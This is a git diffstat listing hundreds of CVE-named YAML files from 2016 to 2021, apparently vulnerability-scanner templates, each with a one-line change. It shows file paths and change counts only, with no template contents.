http/cves/2016/CVE-2016-10367.yaml | 2 +- http/cves/2016/CVE-2016-10368.yaml | 2 +- http/cves/2016/CVE-2016-10940.yaml | 2 +- http/cves/2016/CVE-2016-10960.yaml | 2 +- http/cves/2016/CVE-2016-10973.yaml | 2 +- http/cves/2016/CVE-2016-10976.yaml | 2 +- http/cves/2016/CVE-2016-10993.yaml | 2 +- http/cves/2016/CVE-2016-15042.yaml | 2 +- http/cves/2016/CVE-2016-15043.yaml | 2 +- http/cves/2016/CVE-2016-1555.yaml | 2 +- http/cves/2016/CVE-2016-4437.yaml | 2 +- http/cves/2016/CVE-2016-5649.yaml | 2 +- http/cves/2016/CVE-2016-6195.yaml | 2 +- http/cves/2016/CVE-2016-6277.yaml | 2 +- http/cves/2016/CVE-2016-9299.yaml | 2 +- http/cves/2017/CVE-2017-0929.yaml | 2 +- http/cves/2017/CVE-2017-1000163.yaml | 2 +- http/cves/2017/CVE-2017-1000486.yaml | 2 +- http/cves/2017/CVE-2017-10974.yaml | 2 +- http/cves/2017/CVE-2017-11107.yaml | 2 +- http/cves/2017/CVE-2017-11165.yaml | 2 +- http/cves/2017/CVE-2017-11444.yaml | 2 +- http/cves/2017/CVE-2017-11586.yaml | 2 +- http/cves/2017/CVE-2017-11629.yaml | 2 +- http/cves/2017/CVE-2017-12138.yaml | 2 +- http/cves/2017/CVE-2017-12583.yaml | 2 +- http/cves/2017/CVE-2017-12617.yaml | 2 +- http/cves/2017/CVE-2017-12637.yaml | 2 +- http/cves/2017/CVE-2017-12794.yaml | 2 +- http/cves/2017/CVE-2017-14135.yaml | 2 +- http/cves/2017/CVE-2017-14524.yaml | 2 +- http/cves/2017/CVE-2017-14622.yaml | 2 +- http/cves/2017/CVE-2017-14651.yaml | 2 +- http/cves/2017/CVE-2017-14725.yaml | 2 +- http/cves/2017/CVE-2017-14942.yaml | 2 +- http/cves/2017/CVE-2017-15287.yaml | 2 +- http/cves/2017/CVE-2017-15363.yaml | 2 +- http/cves/2017/CVE-2017-15715.yaml | 2 +- http/cves/2017/CVE-2017-17059.yaml | 2 +- http/cves/2017/CVE-2017-17092.yaml | 2 +- http/cves/2017/CVE-2017-17451.yaml | 2 +- http/cves/2017/CVE-2017-17762.yaml | 2 +- http/cves/2017/CVE-2017-18024.yaml | 2 +- http/cves/2017/CVE-2017-18349.yaml | 2 +- http/cves/2017/CVE-2017-18362.yaml | 2 +- http/cves/2017/CVE-2017-18487.yaml | 2 +- http/cves/2017/CVE-2017-18490.yaml | 2 +- http/cves/2017/CVE-2017-18491.yaml | 2 +- http/cves/2017/CVE-2017-18492.yaml | 2 +- http/cves/2017/CVE-2017-18493.yaml | 2 +- http/cves/2017/CVE-2017-18494.yaml | 2 +- http/cves/2017/CVE-2017-18496.yaml | 2 +- http/cves/2017/CVE-2017-18500.yaml | 2 +- http/cves/2017/CVE-2017-18501.yaml | 2 +- http/cves/2017/CVE-2017-18502.yaml | 2 +- http/cves/2017/CVE-2017-18505.yaml | 2 +- http/cves/2017/CVE-2017-18516.yaml | 2 +- http/cves/2017/CVE-2017-18517.yaml | 2 +- http/cves/2017/CVE-2017-18518.yaml | 2 +- http/cves/2017/CVE-2017-18527.yaml | 2 +- http/cves/2017/CVE-2017-18528.yaml | 2 +- http/cves/2017/CVE-2017-18529.yaml | 2 +- http/cves/2017/CVE-2017-18530.yaml | 2 +- http/cves/2017/CVE-2017-18532.yaml | 2 +- http/cves/2017/CVE-2017-18536.yaml | 2 +- http/cves/2017/CVE-2017-18537.yaml | 2 +- http/cves/2017/CVE-2017-18542.yaml | 2 +- http/cves/2017/CVE-2017-18556.yaml | 2 +- http/cves/2017/CVE-2017-18557.yaml | 2 +- http/cves/2017/CVE-2017-18558.yaml | 2 +- http/cves/2017/CVE-2017-18562.yaml | 2 +- http/cves/2017/CVE-2017-18564.yaml | 2 +- http/cves/2017/CVE-2017-18565.yaml | 2 +- http/cves/2017/CVE-2017-18566.yaml | 2 +- http/cves/2017/CVE-2017-18580.yaml | 2 +- http/cves/2017/CVE-2017-18590.yaml | 2 +- http/cves/2017/CVE-2017-18598.yaml | 2 +- http/cves/2017/CVE-2017-18638.yaml | 2 +- http/cves/2017/CVE-2017-20192.yaml | 2 +- http/cves/2017/CVE-2017-20194.yaml | 2 +- http/cves/2017/CVE-2017-3131.yaml | 2 +- http/cves/2017/CVE-2017-3132.yaml | 2 +- http/cves/2017/CVE-2017-3133.yaml | 2 +- http/cves/2017/CVE-2017-3506.yaml | 2 +- http/cves/2017/CVE-2017-3528.yaml | 2 +- http/cves/2017/CVE-2017-4011.yaml | 2 +- http/cves/2017/CVE-2017-5631.yaml | 2 +- http/cves/2017/CVE-2017-5868.yaml | 2 +- http/cves/2017/CVE-2017-5871.yaml | 2 +- http/cves/2017/CVE-2017-5983.yaml | 2 +- http/cves/2017/CVE-2017-7391.yaml | 2 +- http/cves/2017/CVE-2017-7855.yaml | 2 +- http/cves/2017/CVE-2017-7921.yaml | 2 +- http/cves/2017/CVE-2017-7925.yaml | 2 +- http/cves/2017/CVE-2017-8917.yaml | 2 +- http/cves/2017/CVE-2017-9288.yaml | 2 +- http/cves/2017/CVE-2017-9416.yaml | 2 +- http/cves/2017/CVE-2017-9506.yaml | 2 +- http/cves/2017/CVE-2017-9965.yaml | 2 +- http/cves/2018/CVE-2018-1000129.yaml | 2 +- http/cves/2018/CVE-2018-1000130.yaml | 2 +- http/cves/2018/CVE-2018-1000671.yaml | 2 +- http/cves/2018/CVE-2018-1000856.yaml | 2 +- http/cves/2018/CVE-2018-10093.yaml | 2 +- http/cves/2018/CVE-2018-10095.yaml | 2 +- http/cves/2018/CVE-2018-10141.yaml | 2 +- http/cves/2018/CVE-2018-10201.yaml | 2 +- http/cves/2018/CVE-2018-10230.yaml | 2 +- http/cves/2018/CVE-2018-10562.yaml | 2 +- http/cves/2018/CVE-2018-11133.yaml | 2 +- http/cves/2018/CVE-2018-11231.yaml | 2 +- http/cves/2018/CVE-2018-11473.yaml | 2 +- http/cves/2018/CVE-2018-11511.yaml | 2 +- http/cves/2018/CVE-2018-11686.yaml | 2 +- http/cves/2018/CVE-2018-11709.yaml | 2 +- http/cves/2018/CVE-2018-11776.yaml | 2 +- http/cves/2018/CVE-2018-12031.yaml | 2 +- http/cves/2018/CVE-2018-12095.yaml | 2 +- http/cves/2018/CVE-2018-1217.yaml | 2 +- http/cves/2018/CVE-2018-12296.yaml | 2 +- http/cves/2018/CVE-2018-12300.yaml | 2 +- http/cves/2018/CVE-2018-12455.yaml | 2 +- http/cves/2018/CVE-2018-12675.yaml | 2 +- http/cves/2018/CVE-2018-1271.yaml | 2 +- http/cves/2018/CVE-2018-12909.yaml | 2 +- http/cves/2018/CVE-2018-12998.yaml | 2 +- http/cves/2018/CVE-2018-13317.yaml | 2 +- http/cves/2018/CVE-2018-13980.yaml | 2 +- http/cves/2018/CVE-2018-14013.yaml | 2 +- http/cves/2018/CVE-2018-14474.yaml | 2 +- http/cves/2018/CVE-2018-14574.yaml | 2 +- http/cves/2018/CVE-2018-14728.yaml | 2 +- http/cves/2018/CVE-2018-14916.yaml | 2 +- http/cves/2018/CVE-2018-14931.yaml | 2 +- http/cves/2018/CVE-2018-15517.yaml | 2 +- http/cves/2018/CVE-2018-15535.yaml | 2 +- http/cves/2018/CVE-2018-15811.yaml | 2 +- http/cves/2018/CVE-2018-15917.yaml | 2 +- http/cves/2018/CVE-2018-16139.yaml | 2 +- http/cves/2018/CVE-2018-16288.yaml | 2 +- http/cves/2018/CVE-2018-16299.yaml | 2 +- http/cves/2018/CVE-2018-16668.yaml | 2 +- http/cves/2018/CVE-2018-16670.yaml | 2 +- http/cves/2018/CVE-2018-16671.yaml | 2 +- http/cves/2018/CVE-2018-16716.yaml | 2 +- http/cves/2018/CVE-2018-16761.yaml | 2 +- http/cves/2018/CVE-2018-16979.yaml | 2 +- http/cves/2018/CVE-2018-17082.yaml | 2 +- http/cves/2018/CVE-2018-17153.yaml | 2 +- http/cves/2018/CVE-2018-17173.yaml | 2 +- http/cves/2018/CVE-2018-17283.yaml | 2 +- http/cves/2018/CVE-2018-17422.yaml | 2 +- http/cves/2018/CVE-2018-17431.yaml | 2 +- http/cves/2018/CVE-2018-18069.yaml | 2 +- http/cves/2018/CVE-2018-18264.yaml | 2 +- http/cves/2018/CVE-2018-18325.yaml | 2 +- http/cves/2018/CVE-2018-18570.yaml | 2 +- http/cves/2018/CVE-2018-18608.yaml | 2 +- http/cves/2018/CVE-2018-18775.yaml | 2 +- http/cves/2018/CVE-2018-18925.yaml | 2 +- http/cves/2018/CVE-2018-19127.yaml | 2 +- http/cves/2018/CVE-2018-19136.yaml | 2 +- http/cves/2018/CVE-2018-19137.yaml | 2 +- http/cves/2018/CVE-2018-19287.yaml | 2 +- http/cves/2018/CVE-2018-19365.yaml | 2 +- http/cves/2018/CVE-2018-19386.yaml | 2 +- http/cves/2018/CVE-2018-19749.yaml | 2 +- http/cves/2018/CVE-2018-19751.yaml | 2 +- http/cves/2018/CVE-2018-19752.yaml | 2 +- http/cves/2018/CVE-2018-19753.yaml | 2 +- http/cves/2018/CVE-2018-19877.yaml | 2 +- http/cves/2018/CVE-2018-19892.yaml | 2 +- http/cves/2018/CVE-2018-19914.yaml | 2 +- http/cves/2018/CVE-2018-19915.yaml | 2 +- http/cves/2018/CVE-2018-20009.yaml | 2 +- http/cves/2018/CVE-2018-20010.yaml | 2 +- http/cves/2018/CVE-2018-20011.yaml | 2 +- http/cves/2018/CVE-2018-20462.yaml | 2 +- http/cves/2018/CVE-2018-20470.yaml | 2 +- http/cves/2018/CVE-2018-20824.yaml | 2 +- http/cves/2018/CVE-2018-20985.yaml | 2 +- http/cves/2018/CVE-2018-25114.yaml | 2 +- http/cves/2018/CVE-2018-2791.yaml | 2 +- http/cves/2018/CVE-2018-3167.yaml | 2 +- http/cves/2018/CVE-2018-3238.yaml | 2 +- http/cves/2018/CVE-2018-3714.yaml | 2 +- http/cves/2018/CVE-2018-5230.yaml | 2 +- http/cves/2018/CVE-2018-5233.yaml | 2 +- http/cves/2018/CVE-2018-5316.yaml | 2 +- http/cves/2018/CVE-2018-6184.yaml | 2 +- http/cves/2018/CVE-2018-6200.yaml | 2 +- http/cves/2018/CVE-2018-6530.yaml | 2 +- http/cves/2018/CVE-2018-6882.yaml | 2 +- http/cves/2018/CVE-2018-6961.yaml | 2 +- http/cves/2018/CVE-2018-7192.yaml | 2 +- http/cves/2018/CVE-2018-7193.yaml | 2 +- http/cves/2018/CVE-2018-7196.yaml | 2 +- http/cves/2018/CVE-2018-7251.yaml | 2 +- http/cves/2018/CVE-2018-7282.yaml | 2 +- http/cves/2018/CVE-2018-7314.yaml | 2 +- http/cves/2018/CVE-2018-7653.yaml | 2 +- http/cves/2018/CVE-2018-7700.yaml | 2 +- http/cves/2018/CVE-2018-7765.yaml | 2 +- http/cves/2018/CVE-2018-7841.yaml | 2 +- http/cves/2018/CVE-2018-8024.yaml | 2 +- http/cves/2018/CVE-2018-8033.yaml | 2 +- http/cves/2018/CVE-2018-8719.yaml | 2 +- http/cves/2018/CVE-2018-8727.yaml | 2 +- http/cves/2018/CVE-2018-8770.yaml | 2 +- http/cves/2018/CVE-2018-9205.yaml | 2 +- http/cves/2018/CVE-2018-9206.yaml | 2 +- http/cves/2018/CVE-2018-9845.yaml | 2 +- http/cves/2018/CVE-2019-10647.yaml | 2 +- http/cves/2019/CVE-2019-0221.yaml | 2 +- http/cves/2019/CVE-2019-0230.yaml | 2 +- http/cves/2019/CVE-2019-1003000.yaml | 2 +- http/cves/2019/CVE-2019-10092.yaml | 2 +- http/cves/2019/CVE-2019-1010287.yaml | 2 +- http/cves/2019/CVE-2019-1010290.yaml | 2 +- http/cves/2019/CVE-2019-10232.yaml | 2 +- http/cves/2019/CVE-2019-10405.yaml | 2 +- http/cves/2019/CVE-2019-10692.yaml | 2 +- http/cves/2019/CVE-2019-10717.yaml | 2 +- http/cves/2019/CVE-2019-11013.yaml | 2 +- http/cves/2019/CVE-2019-11248.yaml | 2 +- http/cves/2019/CVE-2019-11253.yaml | 2 +- http/cves/2019/CVE-2019-11370.yaml | 2 +- http/cves/2019/CVE-2019-11507.yaml | 2 +- http/cves/2019/CVE-2019-11510.yaml | 2 +- http/cves/2019/CVE-2019-11580.yaml | 2 +- http/cves/2019/CVE-2019-11869.yaml | 2 +- http/cves/2019/CVE-2019-11886.yaml | 2 +- http/cves/2019/CVE-2019-12461.yaml | 2 +- http/cves/2019/CVE-2019-12581.yaml | 2 +- http/cves/2019/CVE-2019-12593.yaml | 2 +- http/cves/2019/CVE-2019-12935.yaml | 2 +- http/cves/2019/CVE-2019-12962.yaml | 2 +- http/cves/2019/CVE-2019-12989.yaml | 2 +- http/cves/2019/CVE-2019-13392.yaml | 2 +- http/cves/2019/CVE-2019-13396.yaml | 2 +- http/cves/2019/CVE-2019-14205.yaml | 2 +- http/cves/2019/CVE-2019-14206.yaml | 2 +- http/cves/2019/CVE-2019-14223.yaml | 2 +- http/cves/2019/CVE-2019-14251.yaml | 2 +- http/cves/2019/CVE-2019-14312.yaml | 2 +- http/cves/2019/CVE-2019-14470.yaml | 2 +- http/cves/2019/CVE-2019-14530.yaml | 2 +- http/cves/2019/CVE-2019-14696.yaml | 2 +- http/cves/2019/CVE-2019-14750.yaml | 2 +- http/cves/2019/CVE-2019-14789.yaml | 2 +- http/cves/2019/CVE-2019-14950.yaml | 2 +- http/cves/2019/CVE-2019-15043.yaml | 2 +- http/cves/2019/CVE-2019-15501.yaml | 2 +- http/cves/2019/CVE-2019-15713.yaml | 2 +- http/cves/2019/CVE-2019-15774.yaml | 2 +- http/cves/2019/CVE-2019-15811.yaml | 2 +- http/cves/2019/CVE-2019-15829.yaml | 2 +- http/cves/2019/CVE-2019-15858.yaml | 2 +- http/cves/2019/CVE-2019-16057.yaml | 2 +- http/cves/2019/CVE-2019-16123.yaml | 2 +- http/cves/2019/CVE-2019-16313.yaml | 2 +- http/cves/2019/CVE-2019-16332.yaml | 2 +- http/cves/2019/CVE-2019-16525.yaml | 2 +- http/cves/2019/CVE-2019-16662.yaml | 2 +- http/cves/2019/CVE-2019-16759.yaml | 2 +- http/cves/2019/CVE-2019-16920.yaml | 2 +- http/cves/2019/CVE-2019-16931.yaml | 2 +- http/cves/2019/CVE-2019-16932.yaml | 2 +- http/cves/2019/CVE-2019-17228.yaml | 2 +- http/cves/2019/CVE-2019-17230.yaml | 2 +- http/cves/2019/CVE-2019-17231.yaml | 2 +- http/cves/2019/CVE-2019-17232.yaml | 2 +- http/cves/2019/CVE-2019-17233.yaml | 2 +- http/cves/2019/CVE-2019-17382.yaml | 2 +- http/cves/2019/CVE-2019-17418.yaml | 2 +- http/cves/2019/CVE-2019-17538.yaml | 2 +- http/cves/2019/CVE-2019-17558.yaml | 2 +- http/cves/2019/CVE-2019-17564.yaml | 2 +- http/cves/2019/CVE-2019-17662.yaml | 2 +- http/cves/2019/CVE-2019-19134.yaml | 2 +- http/cves/2019/CVE-2019-1943.yaml | 2 +- http/cves/2019/CVE-2019-19822.yaml | 2 +- http/cves/2019/CVE-2019-19825.yaml | 2 +- http/cves/2019/CVE-2019-19908.yaml | 2 +- http/cves/2019/CVE-2019-19985.yaml | 2 +- http/cves/2019/CVE-2019-20141.yaml | 2 +- http/cves/2019/CVE-2019-20183.yaml | 2 +- http/cves/2019/CVE-2019-20210.yaml | 2 +- http/cves/2019/CVE-2019-20504.yaml | 2 +- http/cves/2019/CVE-2019-25141.yaml | 2 +- http/cves/2019/CVE-2019-25152.yaml | 2 +- http/cves/2019/CVE-2019-2578.yaml | 2 +- http/cves/2019/CVE-2019-2616.yaml | 2 +- http/cves/2019/CVE-2019-2725.yaml | 2 +- http/cves/2019/CVE-2019-2767.yaml | 2 +- http/cves/2019/CVE-2019-3396.yaml | 2 +- http/cves/2019/CVE-2019-3401.yaml | 2 +- http/cves/2019/CVE-2019-3402.yaml | 2 +- http/cves/2019/CVE-2019-3799.yaml | 2 +- http/cves/2019/CVE-2019-3911.yaml | 2 +- http/cves/2019/CVE-2019-3912.yaml | 2 +- http/cves/2019/CVE-2019-5127.yaml | 2 +- http/cves/2019/CVE-2019-5129.yaml | 2 +- http/cves/2019/CVE-2019-5591.yaml | 2 +- http/cves/2019/CVE-2019-6703.yaml | 2 +- http/cves/2019/CVE-2019-6715.yaml | 2 +- http/cves/2019/CVE-2019-6802.yaml | 2 +- http/cves/2019/CVE-2019-7139.yaml | 2 +- http/cves/2019/CVE-2019-7195.yaml | 2 +- http/cves/2019/CVE-2019-7219.yaml | 2 +- http/cves/2019/CVE-2019-7238.yaml | 2 +- http/cves/2019/CVE-2019-7254.yaml | 2 +- http/cves/2019/CVE-2019-7275.yaml | 2 +- http/cves/2019/CVE-2019-7481.yaml | 2 +- http/cves/2019/CVE-2019-7543.yaml | 2 +- http/cves/2019/CVE-2019-7609.yaml | 2 +- http/cves/2019/CVE-2019-8086.yaml | 2 +- http/cves/2019/CVE-2019-8390.yaml | 2 +- http/cves/2019/CVE-2019-8449.yaml | 2 +- http/cves/2019/CVE-2019-8451.yaml | 2 +- http/cves/2019/CVE-2019-8903.yaml | 2 +- http/cves/2019/CVE-2019-8937.yaml | 2 +- http/cves/2019/CVE-2019-9082.yaml | 2 +- http/cves/2019/CVE-2019-9194.yaml | 2 +- http/cves/2019/CVE-2019-9733.yaml | 2 +- http/cves/2019/CVE-2019-9879.yaml | 2 +- http/cves/2019/CVE-2019-9880.yaml | 2 +- http/cves/2019/CVE-2019-9912.yaml | 2 +- http/cves/2019/CVE-2019-9915.yaml | 2 +- http/cves/2019/CVE-2019-9955.yaml | 2 +- http/cves/2019/CVE-2019-9978.yaml | 2 +- http/cves/2020/CVE-2020-10220.yaml | 2 +- http/cves/2020/CVE-2020-10257.yaml | 2 +- http/cves/2020/CVE-2020-10547.yaml | 2 +- http/cves/2020/CVE-2020-10770.yaml | 2 +- http/cves/2020/CVE-2020-10987.yaml | 2 +- http/cves/2020/CVE-2020-11034.yaml | 2 +- http/cves/2020/CVE-2020-11441.yaml | 2 +- http/cves/2020/CVE-2020-11515.yaml | 2 +- http/cves/2020/CVE-2020-11710.yaml | 2 +- http/cves/2020/CVE-2020-11853.yaml | 2 +- http/cves/2020/CVE-2020-11854.yaml | 2 +- http/cves/2020/CVE-2020-11930.yaml | 2 +- http/cves/2020/CVE-2020-11975.yaml | 2 +- http/cves/2020/CVE-2020-11991.yaml | 2 +- http/cves/2020/CVE-2020-12054.yaml | 2 +- http/cves/2020/CVE-2020-12256.yaml | 2 +- http/cves/2020/CVE-2020-12262.yaml | 2 +- http/cves/2020/CVE-2020-12720.yaml | 2 +- http/cves/2020/CVE-2020-12832.yaml | 2 +- http/cves/2020/CVE-2020-13121.yaml | 2 +- http/cves/2020/CVE-2020-13125.yaml | 2 +- http/cves/2020/CVE-2020-13158.yaml | 2 +- http/cves/2020/CVE-2020-13167.yaml | 2 +- http/cves/2020/CVE-2020-13258.yaml | 2 +- http/cves/2020/CVE-2020-13379.yaml | 2 +- http/cves/2020/CVE-2020-13405.yaml | 2 +- http/cves/2020/CVE-2020-13483.yaml | 2 +- http/cves/2020/CVE-2020-13820.yaml | 2 +- http/cves/2020/CVE-2020-13886.yaml | 2 +- http/cves/2020/CVE-2020-13927.yaml | 2 +- http/cves/2020/CVE-2020-13937.yaml | 2 +- http/cves/2020/CVE-2020-13945.yaml | 2 +- http/cves/2020/CVE-2020-14092.yaml | 2 +- http/cves/2020/CVE-2020-14179.yaml | 2 +- http/cves/2020/CVE-2020-14181.yaml | 2 +- http/cves/2020/CVE-2020-14408.yaml | 2 +- http/cves/2020/CVE-2020-14413.yaml | 2 +- http/cves/2020/CVE-2020-14864.yaml | 2 +- http/cves/2020/CVE-2020-14883.yaml | 2 +- http/cves/2020/CVE-2020-15050.yaml | 2 +- http/cves/2020/CVE-2020-15148.yaml | 2 +- http/cves/2020/CVE-2020-15500.yaml | 2 +- http/cves/2020/CVE-2020-15895.yaml | 2 +- http/cves/2020/CVE-2020-15906.yaml | 2 +- http/cves/2020/CVE-2020-16846.yaml | 2 +- http/cves/2020/CVE-2020-17453.yaml | 2 +- http/cves/2020/CVE-2020-17456.yaml | 2 +- http/cves/2020/CVE-2020-17463.yaml | 2 +- http/cves/2020/CVE-2020-17496.yaml | 2 +- http/cves/2020/CVE-2020-17505.yaml | 2 +- http/cves/2020/CVE-2020-17506.yaml | 2 +- http/cves/2020/CVE-2020-17526.yaml | 2 +- http/cves/2020/CVE-2020-19283.yaml | 2 +- http/cves/2020/CVE-2020-19295.yaml | 2 +- http/cves/2020/CVE-2020-19363.yaml | 2 +- http/cves/2020/CVE-2020-1943.yaml | 2 +- http/cves/2020/CVE-2020-19515.yaml | 2 +- http/cves/2020/CVE-2020-20285.yaml | 2 +- http/cves/2020/CVE-2020-20300.yaml | 2 +- http/cves/2020/CVE-2020-20601.yaml | 2 +- http/cves/2020/CVE-2020-20627.yaml | 2 +- http/cves/2020/CVE-2020-20988.yaml | 2 +- http/cves/2020/CVE-2020-2103.yaml | 2 +- http/cves/2020/CVE-2020-21224.yaml | 2 +- http/cves/2020/CVE-2020-2140.yaml | 2 +- http/cves/2020/CVE-2020-21998.yaml | 2 +- http/cves/2020/CVE-2020-22165.yaml | 2 +- http/cves/2020/CVE-2020-22208.yaml | 2 +- http/cves/2020/CVE-2020-22209.yaml | 2 +- http/cves/2020/CVE-2020-22210.yaml | 2 +- http/cves/2020/CVE-2020-23015.yaml | 2 +- http/cves/2020/CVE-2020-23517.yaml | 2 +- http/cves/2020/CVE-2020-23697.yaml | 2 +- http/cves/2020/CVE-2020-23814.yaml | 2 +- http/cves/2020/CVE-2020-24186.yaml | 2 +- http/cves/2020/CVE-2020-24223.yaml | 2 +- http/cves/2020/CVE-2020-24285.yaml | 2 +- http/cves/2020/CVE-2020-24312.yaml | 2 +- http/cves/2020/CVE-2020-24391.yaml | 2 +- http/cves/2020/CVE-2020-24550.yaml | 2 +- http/cves/2020/CVE-2020-24701.yaml | 2 +- http/cves/2020/CVE-2020-24881.yaml | 2 +- http/cves/2020/CVE-2020-24902.yaml | 2 +- http/cves/2020/CVE-2020-24903.yaml | 2 +- http/cves/2020/CVE-2020-24912.yaml | 2 +- http/cves/2020/CVE-2020-25078.yaml | 2 +- http/cves/2020/CVE-2020-25200.yaml | 2 +- http/cves/2020/CVE-2020-25213.yaml | 2 +- http/cves/2020/CVE-2020-25223.yaml | 2 +- http/cves/2020/CVE-2020-25495.yaml | 2 +- http/cves/2020/CVE-2020-2551.yaml | 2 +- http/cves/2020/CVE-2020-25780.yaml | 2 +- http/cves/2020/CVE-2020-26073.yaml | 2 +- http/cves/2020/CVE-2020-26258.yaml | 2 +- http/cves/2020/CVE-2020-26836.yaml | 2 +- http/cves/2020/CVE-2020-26879.yaml | 2 +- http/cves/2020/CVE-2020-2733.yaml | 2 +- http/cves/2020/CVE-2020-27361.yaml | 2 +- http/cves/2020/CVE-2020-27481.yaml | 2 +- http/cves/2020/CVE-2020-27982.yaml | 2 +- http/cves/2020/CVE-2020-28185.yaml | 2 +- http/cves/2020/CVE-2020-28208.yaml | 2 +- http/cves/2020/CVE-2020-28351.yaml | 2 +- http/cves/2020/CVE-2020-28976.yaml | 2 +- http/cves/2020/CVE-2020-29164.yaml | 2 +- http/cves/2020/CVE-2020-29214.yaml | 2 +- http/cves/2020/CVE-2020-29279.yaml | 2 +- http/cves/2020/CVE-2020-29390.yaml | 2 +- http/cves/2020/CVE-2020-29395.yaml | 2 +- http/cves/2020/CVE-2020-29597.yaml | 2 +- http/cves/2020/CVE-2020-35131.yaml | 2 +- http/cves/2020/CVE-2020-35338.yaml | 2 +- http/cves/2020/CVE-2020-35476.yaml | 2 +- http/cves/2020/CVE-2020-35598.yaml | 2 +- http/cves/2020/CVE-2020-35749.yaml | 2 +- http/cves/2020/CVE-2020-35774.yaml | 2 +- http/cves/2020/CVE-2020-35984.yaml | 2 +- http/cves/2020/CVE-2020-35985.yaml | 2 +- http/cves/2020/CVE-2020-35986.yaml | 2 +- http/cves/2020/CVE-2020-36333.yaml | 2 +- http/cves/2020/CVE-2020-36365.yaml | 2 +- http/cves/2020/CVE-2020-36510.yaml | 2 +- http/cves/2020/CVE-2020-36723.yaml | 2 +- http/cves/2020/CVE-2020-36728.yaml | 2 +- http/cves/2020/CVE-2020-36836.yaml | 2 +- http/cves/2020/CVE-2020-5191.yaml | 2 +- http/cves/2020/CVE-2020-5410.yaml | 2 +- http/cves/2020/CVE-2020-5775.yaml | 2 +- http/cves/2020/CVE-2020-5776.yaml | 2 +- http/cves/2020/CVE-2020-5777.yaml | 2 +- http/cves/2020/CVE-2020-6287.yaml | 2 +- http/cves/2020/CVE-2020-6308.yaml | 2 +- http/cves/2020/CVE-2020-7107.yaml | 2 +- http/cves/2020/CVE-2020-7209.yaml | 2 +- http/cves/2020/CVE-2020-7318.yaml | 2 +- http/cves/2020/CVE-2020-7796.yaml | 2 +- http/cves/2020/CVE-2020-7943.yaml | 2 +- http/cves/2020/CVE-2020-7980.yaml | 2 +- http/cves/2020/CVE-2020-8115.yaml | 2 +- http/cves/2020/CVE-2020-8163.yaml | 2 +- http/cves/2020/CVE-2020-8191.yaml | 2 +- http/cves/2020/CVE-2020-8194.yaml | 2 +- http/cves/2020/CVE-2020-8644.yaml | 2 +- http/cves/2020/CVE-2020-8654.yaml | 2 +- http/cves/2020/CVE-2020-8657.yaml | 2 +- http/cves/2020/CVE-2020-8771.yaml | 2 +- http/cves/2020/CVE-2020-8772.yaml | 2 +- http/cves/2020/CVE-2020-8813.yaml | 2 +- http/cves/2020/CVE-2020-9036.yaml | 2 +- http/cves/2020/CVE-2020-9043.yaml | 2 +- http/cves/2020/CVE-2020-9344.yaml | 2 +- http/cves/2020/CVE-2020-9425.yaml | 2 +- http/cves/2020/CVE-2020-9483.yaml | 2 +- http/cves/2020/CVE-2020-9484.yaml | 2 +- http/cves/2020/CVE-2020-9547.yaml | 2 +- http/cves/2021/CVE-2021-1472.yaml | 2 +- http/cves/2021/CVE-2021-1497.yaml | 2 +- http/cves/2021/CVE-2021-1498.yaml | 2 +- http/cves/2021/CVE-2021-1499.yaml | 2 +- http/cves/2021/CVE-2021-20031.yaml | 2 +- http/cves/2021/CVE-2021-20114.yaml | 2 +- http/cves/2021/CVE-2021-20137.yaml | 2 +- http/cves/2021/CVE-2021-20150.yaml | 2 +- http/cves/2021/CVE-2021-20158.yaml | 2 +- http/cves/2021/CVE-2021-20167.yaml | 2 +- http/cves/2021/CVE-2021-20323.yaml | 2 +- http/cves/2021/CVE-2021-20617.yaml | 2 +- http/cves/2021/CVE-2021-20792.yaml | 2 +- http/cves/2021/CVE-2021-21087.yaml | 2 +- http/cves/2021/CVE-2021-21234.yaml | 2 +- http/cves/2021/CVE-2021-21287.yaml | 2 +- http/cves/2021/CVE-2021-21345.yaml | 2 +- http/cves/2021/CVE-2021-2135.yaml | 2 +- http/cves/2021/CVE-2021-21745.yaml | 2 +- http/cves/2021/CVE-2021-21801.yaml | 2 +- http/cves/2021/CVE-2021-21802.yaml | 2 +- http/cves/2021/CVE-2021-21816.yaml | 2 +- http/cves/2021/CVE-2021-21972.yaml | 2 +- http/cves/2021/CVE-2021-21978.yaml | 2 +- http/cves/2021/CVE-2021-21985.yaml | 2 +- http/cves/2021/CVE-2021-22054.yaml | 2 +- http/cves/2021/CVE-2021-22122.yaml | 2 +- http/cves/2021/CVE-2021-22145.yaml | 2 +- http/cves/2021/CVE-2021-23241.yaml | 2 +- http/cves/2021/CVE-2021-24146.yaml | 2 +- http/cves/2021/CVE-2021-24150.yaml | 2 +- http/cves/2021/CVE-2021-24165.yaml | 2 +- http/cves/2021/CVE-2021-24169.yaml | 2 +- http/cves/2021/CVE-2021-24170.yaml | 2 +- http/cves/2021/CVE-2021-24176.yaml | 2 +- http/cves/2021/CVE-2021-24210.yaml | 2 +- http/cves/2021/CVE-2021-24212.yaml | 2 +- http/cves/2021/CVE-2021-24213.yaml | 2 +- http/cves/2021/CVE-2021-24214.yaml | 2 +- http/cves/2021/CVE-2021-24215.yaml | 2 +- http/cves/2021/CVE-2021-24219.yaml | 2 +- http/cves/2021/CVE-2021-24220.yaml | 2 +- http/cves/2021/CVE-2021-24226.yaml | 2 +- http/cves/2021/CVE-2021-24227.yaml | 2 +- http/cves/2021/CVE-2021-24235.yaml | 2 +- http/cves/2021/CVE-2021-24236.yaml | 2 +- http/cves/2021/CVE-2021-24237.yaml | 2 +- http/cves/2021/CVE-2021-24239.yaml | 2 +- http/cves/2021/CVE-2021-24274.yaml | 2 +- http/cves/2021/CVE-2021-24276.yaml | 2 +- http/cves/2021/CVE-2021-24286.yaml | 2 +- http/cves/2021/CVE-2021-24287.yaml | 2 +- http/cves/2021/CVE-2021-24288.yaml | 2 +- http/cves/2021/CVE-2021-24291.yaml | 2 +- http/cves/2021/CVE-2021-24295.yaml | 2 +- http/cves/2021/CVE-2021-24298.yaml | 2 +- http/cves/2021/CVE-2021-24300.yaml | 2 +- http/cves/2021/CVE-2021-24320.yaml | 2 +- http/cves/2021/CVE-2021-24335.yaml | 2 +- http/cves/2021/CVE-2021-24342.yaml | 2 +- http/cves/2021/CVE-2021-24351.yaml | 2 +- http/cves/2021/CVE-2021-24364.yaml | 2 +- http/cves/2021/CVE-2021-24370.yaml | 2 +- http/cves/2021/CVE-2021-24387.yaml | 2 +- http/cves/2021/CVE-2021-24389.yaml | 2 +- http/cves/2021/CVE-2021-24406.yaml | 2 +- http/cves/2021/CVE-2021-24407.yaml | 2 +- http/cves/2021/CVE-2021-24409.yaml | 2 +- http/cves/2021/CVE-2021-24435.yaml | 2 +- 